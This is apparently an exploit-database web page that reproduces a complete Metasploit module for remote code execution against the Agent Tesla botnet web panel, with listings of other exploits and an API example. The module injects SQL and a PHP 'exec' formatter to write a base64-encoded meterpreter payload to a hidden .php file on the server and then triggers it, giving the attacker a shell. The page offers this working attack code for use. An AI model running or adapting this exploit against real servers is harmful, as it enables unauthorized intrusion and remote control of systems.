Menu

Search for hundreds of thousands of exploits

"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)"

Author

"Ege Balci"

Platform

php

Release date

2019-08-14

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Tesla Agent Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of tesla agent botnet panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP ],
      'Targets'        =>
      [
        ['PHP payload',
          {
            'Platform' => 'PHP',
            'Arch' => ARCH_PHP,
            'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
          }
        ]
      ],
      'Privileged'     => false,
      'DisclosureDate' => "July 10 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
    )
    #print_status(res.body)
    if res && res.body.include?('SQLSTATE')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    check

    name = '.'+Rex::Text.rand_text_alpha(4)+'.php'

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
      'encode_params' => true,
      'vars_get'  => {
        'table'  => 'passwords',
        'primary'  => 'password_id',
        'clmns'  => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
        'where'  => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
      }
    )

    if res && res.code == 200 && res.body.include?('recordsTotal')
      print_good("Payload uploaded as #{name}")  
    else
      print_error('Payload upload failed :(')
      Msf::Exploit::Failed
    end

    
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
    )
    
    if res && res.code == 200
      print_good("Payload successfully triggered !")  
    else
      print_error('Payload trigger failed :(')
      Msf::Exploit::Failed
    end
    
  end
end
Release Date Title Type Platform Author
2019-08-20 "WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-19 "YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection" webapps php "Fabian Mosch"
2019-08-19 "Neo Billing 3.5 - Persistent Cross-Site Scripting" webapps php n1x_
2019-08-19 "Kimai 2 - Persistent Cross-Site Scripting" webapps php osamaalaa
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
Release Date Title Type Platform Author
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2018-09-12 "LG Smart IP Camera 1508190 - Backup File Download" webapps hardware "Ege Balci"
2017-02-10 "F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure" remote hardware "Ege Balci"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47256/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47256/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47256/41617/agent-tesla-botnet-arbitrary-code-execution-metasploit/download/", "exploit_id": "47256", "exploit_description": "\"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)\"", "exploit_date": "2019-08-14", "exploit_author": "\"Ege Balci\"", "exploit_type": "remote", "exploit_platform": "php", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse